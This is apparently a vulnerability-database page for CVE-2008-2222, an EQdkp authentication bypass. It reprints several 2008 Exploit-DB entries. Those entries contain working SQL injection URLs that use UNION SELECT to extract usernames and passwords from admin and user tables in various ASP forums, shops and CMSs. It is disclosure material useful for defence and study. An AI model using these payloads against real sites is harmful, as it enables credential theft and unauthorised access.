CVE-2008-2222
published 2008-05-14CVE-2008-2222: SQL injection vulnerability in login.php in EQdkp 1.3.2f allows remote attackers to bypass EQdkp user authentication via the user_id parameter.
PriorityP344high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.06%
60.2th percentile
SQL injection vulnerability in login.php in EQdkp 1.3.2f allows remote attackers to bypass EQdkp user authentication via the user_id parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| eqdkp | eqdkp | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
FipsCMS Light 2.1 - 'r' SQL Injection
exploitdb·2008-07-26
CVE-2008-3417 FipsCMS Light 2.1 - 'r' SQL Injection
FipsCMS Light 2.1 - 'r' SQL Injection
---
Exploit Code:
victim/path/home/index.asp?w=pages&r=9999999 union select all 0,username,null,0x1 from admin
victim/path/home/index.asp?w=pages&r=9999999 union select all 0,password,null,0x1 from admin
http://localhost:2222/lab/cms/_admin
Download:http://login.fipsasp.com/File.asp?ID=60&CatID=5
Found By U238
# Exploit Search Find: ^o)
#
# fipsCMS light - © fipsASP 2003 - 2008. All rights reserved
#
# fipsCMS light - © fipsASP 2003 - 2008
#
# inurl:"fipsASP 2003 - 2008"
# ************************************************
# milw0rm.com [2008-07-26]
Exploit-DB
philboard 0.5 - 'W1L3D4_konuoku.asp?id' SQL Injection
exploitdb·2008-05-14
CVE-2008-2334 philboard 0.5 - 'W1L3D4_konuoku.asp?id' SQL Injection
philboard 0.5 - 'W1L3D4_konuoku.asp?id' SQL Injection
---
source: https://www.securityfocus.com/bid/29229/info
Philboard is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Philboard 0.5 is vulnerable; other versions may also be affected.
http://www.example.com:2222/lab/philboard_v5/W1L3D4_konuoku.asp?id=1+union+select+0,1,2,3,4,5,6,1,1,1,1,1,1,1,7,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,8,9,1,1,1,1,1,1,1,1,1,1+from+users
Exploit-DB
philboard 0.5 - 'W1L3D4_konuya_mesaj_yaz.asp' Multiple SQL Injections
exploitdb·2008-05-14
CVE-2008-2334 philboard 0.5 - 'W1L3D4_konuya_mesaj_yaz.asp' Multiple SQL Injections
philboard 0.5 - 'W1L3D4_konuya_mesaj_yaz.asp' Multiple SQL Injections
---
source: https://www.securityfocus.com/bid/29229/info
Philboard is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Philboard 0.5 is vulnerable; other versions may also be affected.
http://www.example.com:2222/lab/philboard_v5/W1L3D4_konuya_mesaj_yaz.asp?id=1+union+select+(password),username,password,password,4,1,1,1,null,1,password,password,password,password,password+from+users
Exploit-DB
philboard 0.5 - 'W1L3D4_foruma_yeni_konu_ac.asp?forumid' SQL Injection
exploitdb·2008-05-14
CVE-2008-2334 philboard 0.5 - 'W1L3D4_foruma_yeni_konu_ac.asp?forumid' SQL Injection
philboard 0.5 - 'W1L3D4_foruma_yeni_konu_ac.asp?forumid' SQL Injection
---
source: https://www.securityfocus.com/bid/29229/info
Philboard is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Philboard 0.5 is vulnerable; other versions may also be affected.
http://www.example.com:2222/lab/philboard_v5/W1L3D4_foruma_yeni_konu_ac.asp?forumid=1+union+select+0,1,(username),(password),1,1+from+users
Exploit-DB
EQdkp 1.3.2f - 'user_id' Authentication Bypass
exploitdb·2008-05-13
CVE-2008-2222 EQdkp 1.3.2f - 'user_id' Authentication Bypass
EQdkp 1.3.2f - 'user_id' Authentication Bypass
---
# milw0rm.com [2008-05-13]
Exploit-DB
Meto Forum 1.1 - Multiple SQL Injections
exploitdb·2008-05-13
CVE-2008-2448 Meto Forum 1.1 - Multiple SQL Injections
Meto Forum 1.1 - Multiple SQL Injections
---
-\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\
Meto Forum v1.1 Multiple Remote SQL İinjectin Vulnerable
Script : http://www.aspindir.com/goster/5444
Risk : Forum in All users saved password is to take.
Coded : Asp , SQL Language = 'Acces'
-\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\- -\-/
EİP [1] Exploit:
http://localhost:2222/lab/MetoForumV1/forum/kategori.asp?kid=20+union+select+0,kullanici,2,3,4,parola,6+from+uyeler&y=SnnX%20Mesaj%20Panosu%20Test
Log in Admin Panel > cookie Saved ,
This Script file have SQL İnjectin atack.
http://localhost:2222/lab/MetoForumV1/forum/admin_kategori.asp?kid=1+union+select+0,1,parola,3,4,kullanici,6+from+uyeler+where+id=1 2,3,4,5,6
http://localhost:2222/lab/M
Exploit-DB
Shader TV (Beta) - Multiple SQL Injections
exploitdb·2008-05-08
CVE-2008-6641 Shader TV (Beta) - Multiple SQL Injections
Shader TV (Beta) - Multiple SQL Injections
---
Shader TV (Beta) Multiple Remote SQL İnjection Vulnerable
Script : http://www.aspindir.com/indir.asp?ID=5441
Script : http://rapidshare.de/files/39341463/ShaderTV.zip.html
Coded : Asp
Lnguae : Acces
Discovered By U238 |
Friends : ka0x - The_BekiR - Marco Almeida - Erhan Bulut - Caborz :
Web - Designer Solution Developer
[email protected]
http://noexec.blogspot.com
0x1 = [S** Says : Allah Belanı Versin Ulan Şiz0 !]
0x2 = [Ben Sadece İyi Bir İnsan Olmak İstemistim ]
Exploit:
Administrator Login to creative web panel is atack of to SQL injectin.
http://localhost:2222/lab/ShaderTV/yonet/kanal.asp?islem=degistir&sid=13+union+select+0,kullanici,parola,3,4,5+from+tblyonetici
----
http://localhost:2222/lab/Shade
Exploit-DB
Angelo-Emlak 1.0 - Multiple SQL Injections
exploitdb·2008-04-26
CVE-2008-2048 Angelo-Emlak 1.0 - Multiple SQL Injections
Angelo-Emlak 1.0 - Multiple SQL Injections
---
Angelo-Emlak v1.0 Multiple Remote SQL injection Vulnerable
Discovered By : U238
msn :setuid.noexec0x1[+]hotmail[-].com
webPage :http://noexec.blogspot.com
Script : http://www.aspdepo.org/tr/incele.asp?id=587&Script=angelo-emlak-v1.0-(tr)
Script2 : http://rapidshare.de/files/39240819/angelo-emlak_v1.0.zip.html
not : Siz0yyffyeniz biz kardesim inkar edenmı var ya :( - Allah .belanı versin ulan $iz0 .buda yılın sozu :D
Exploit:
http://localhost:2222/lab/angelo-emlak_v1.0/hpz/profil.asp?id=1+union+select+0,1,2,3,(user),(pass),1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+admin+where+id=1
http://localhost:2222/lab/angelo-emlak_v1.0/hpz/prodetail.asp?id=1+union+select+user,0,2,3,4,5,6,7,8,9,null,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,
Exploit-DB
W1L3D4 philboard 1.0 - 'philboard_reply.asp' SQL Injection
exploitdb·2008-04-20
CVE-2008-1939 W1L3D4 philboard 1.0 - 'philboard_reply.asp' SQL Injection
W1L3D4 philboard 1.0 - 'philboard_reply.asp' SQL Injection
---
Philboard W1L3D4 v1.0 Multiple SQL İnjection Vulnerable
Author : U238
mail : setuid.noexec0x1[aq]hotmail[dot]com
webpage: http://noexec.blogspot.com
Script : http://www.aspindir.com/Goster/4703
Script2: http://rapidshare.de/files/39107179/philboardtrge.zip.html
[0x1] Exploit:
http://localhost:2222/lab/philboard/philboard_reply.asp?id=1+union+select+0,1,2,3,4,5,6,7,8,username,1,9,0,1,2+from+users
http://localhost:2222/lab/philboard/philboard_reply.asp?id=1+union+select+0,1,2,3,4,5,6,7,8,password,1,9,0,1,2+from+users
*
http://localhost:2222/lab/philboard/philboard_reply.asp?topic=1+union+select+0,username,2,3,4,5,6+from+users
http://localhost:2222/lab/philboard/philboard_reply.asp?topic=1+union+select+0,password,2
Exploit-DB
SuperNET Shop 1.0 - SQL Injection
exploitdb·2008-04-08
CVE-2008-6204 SuperNET Shop 1.0 - SQL Injection
SuperNET Shop 1.0 - SQL Injection
---
SuperNET Shop v1.0 Remote SQL İnjection Vulnerability
Discovered By : U238 (ugur238)
webpage : ugur238.org (the end)
mail : [email protected]
>From : Turkey - Erzincan
Script : http://www.aspindir.com/indir.asp?ID=2
Script (alternativ) : http://rapidshare.de/files/39062184/supershop.zip.html
Exploit:
localhost:2222/lab/shop/secure/admin/guncelle.asp?id=1+union+select+0,KullaniciAdi,2,sifre,4,5,6,7,8,9+from+admin
Error File : guncelle.asp
Error Code :
line - id = Request.QueryString("id")
line - SQL_L = "Select * from products WHERE id =" &id
Admin Panel : target/secure/admin
Admin Panel Bypass Exploit :
Error File :
giris.asp
Error Code :
Sorgu="select * from admin where KullaniciAdi = '" & request.form("ku
Exploit-DB
Cobalt 0.1 - Multiple SQL Injections
exploitdb·2008-04-05
CVE-2008-6202 Cobalt 0.1 - Multiple SQL Injections
Cobalt 0.1 - Multiple SQL Injections
---
CoBaLT v1.0 Remote SQL İnjection Vulnerabiltiy
Discovered : U238
Mail : [email protected]
WebPage : http://ugur238.org (The End)
Script: http://www.aspindir.com/indir.asp?ID=5414
Script (Alternativ) : http://rapidshare.de/files/39031038/cobaltv.1.zip.html
Exploit:
http://localhost:2222/lab/cobaltv.1/urun.asp?id=24+union+select+0,1,sifre,3,kadi+from+yonetici
http://localhost:2222/lab/cobaltv.1/admin/bayi_listele.asp?git=duzenle&id=98+union+select+0,1,2,3,sifre,5,kadi,7,8+from+yonetici+where+id=2
----
http://localhost:2222/lab/cobaltv.1/admin/urun_grup_listele.asp?git=duzenle&id=24+union+select+0,kadi+from+yonetici
http://localhost:2222/lab/cobaltv.1/admin/urun_grup_listele.asp?git=duzenle&id=24+union+select+0,sifre+from+yon
No writeups or analysis indexed.
http://secunia.com/advisories/30206http://www.securityfocus.com/bid/29184https://exchange.xforce.ibmcloud.com/vulnerabilities/42381https://www.exploit-db.com/exploits/5603http://secunia.com/advisories/30206http://www.securityfocus.com/bid/29184https://exchange.xforce.ibmcloud.com/vulnerabilities/42381https://www.exploit-db.com/exploits/5603
2008-05-14
Published